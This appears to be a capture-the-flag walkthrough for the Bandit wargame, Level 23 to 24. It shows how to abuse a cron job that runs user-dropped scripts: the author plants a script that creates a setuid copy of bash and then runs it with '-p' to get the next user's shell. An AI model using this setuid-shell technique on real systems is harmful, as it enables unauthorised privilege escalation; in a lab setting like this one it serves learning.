Bandit Level 23 → Level 24

cat /etc/cron.d/cronjob_bandit24

If we read it:

cat /usr/bin/cronjob_bandit24.sh

So it will execute all scripts in the /var/spool/bandit24/foo directory everyone minute, and then delete everything. So lets write a simple bash script that will copy /bin/bash binary to another file and give it setuid bit, and we will place it in the /tmp/Caesar3 directory:

mkdir /tmp/Caesar3

cd /tmp/Caesar3

vim script.sh

:wq

cat script.sh

#!/usr/bin/bash

cp /bin/bash /tmp/Caesar3/bash; chmod u+s /tmp/Caesar3/bash

chmod +x script.sh

cp script.h /var/spool/bandit24/foo/

ls /var/spool/bandit24/foo/script.sh

Also we give everyone the permission to write in that directory we just created:

chmod 777 /tmp/Caesar3

As we can see here is the bash binary, and we can execute it as the user bandit24:

./bash -p

Here is the password for the next user.

Note: Check for the script for instance every 30 seconds, if it was deleted, just copy it again, and wait.

PreviousBandit Level 22 → Level 23 NextBandit Level 24 → Level 25

Last updated 11 months ago